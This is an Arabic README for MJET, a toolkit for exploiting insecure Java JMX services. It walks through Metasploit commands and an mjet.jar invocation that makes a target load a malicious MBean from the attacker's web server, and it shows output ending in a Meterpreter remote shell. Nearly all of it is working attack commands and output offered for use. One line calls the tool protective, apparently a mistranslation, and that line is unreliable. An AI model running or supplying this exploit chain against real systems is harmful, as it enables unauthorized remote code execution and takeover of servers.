
مجموعة أدوات استغلال Java Management Extensions (JMX) من Mogwai
مجموعة أدوات Mogwai Security لاستغلال امتدادات إدارة Java (JMX)
mjet هي أداة يمكن استخدامها لحماية خدمات JMX ذات الإعدادات غير الآمنة. وهي مبنية على مقالة "Exploiting JMX-RMI" بقلم Braden Thomas/Accuvant "http://www.accuvant.com/blog/exploiting-jmx-rmi" ويمكن استخدامها لتنفيذ حمولات Metasploit عشوائية على النظام المستهدف.
كان من المخطط أصلاً أن تكون mjet مجموعة أدوات هجومية متكاملة، ومع ذلك لاحظنا أن مستودع Metasploit على github يحتوي على طلب سحب (pull request) من شأنه توفير دعم أساسي لـ Java RMI/التسلسل (serialization) بلغة روبي الأصلية. هذا أمر رائع ويزيل الاعتماد على Java. لذا توقفنا عن تطوير هذه الأداة وسننشئ وحدات Metasploit في المستقبل القريب.
تتكون mjet من الأجزاء التالية:
يستخدم المثال الأنظمة التالية: المهاجم: 192.168.178.1 الهدف: 192.168.178.200، خدمة JMX تعمل على منفذ TCP 1616
msf > use exploit/multi/misc/java_mlet_server
msf > set LHOST 192.168.178.1
msf > set SRVHOST 192.168.178.1
msf > set URIPATH /mlet/
msf > run
استخدم mjet.jar للاتصال بخدمة JMX المعرضة للخطر ووفّر عنوان URL إلى خادم الويب MLet...
java -jar mjet.jar -t 192.168.178.200 -p 1616 -u http://192.168.178.1:8080/mlet/
---------------------------------------------------
MJET - Mogwai Security JMX Exploitation Toolkit 0.1
---------------------------------------------------
[+] Connecting to JMX URL: service:jmx:rmi:///jndi/rmi://192.168.178.200:1616/jmxrmi ...
[+] Connected: rmi://192.168.178.164 5
[+] Trying to create MLet bean...
[+] Loaded javax.management.loading.MLet
[+] Loading malicious MBean from http://192.168.178.1:8080/mlet/
[+] Invoking: javax.management.loading.MLet.getMBeansFromURL
[+] Loaded class: metasploit.Metasploit
[+] Loaded MBean Server ID: ptIIirfM:name=BlPwaoHu,id=oWTqfkbE
[+] Invoking: metasploit.Metasploit.run()
[+] Done
واستمتع بصدفة Meterpreter الخاصة بك :-)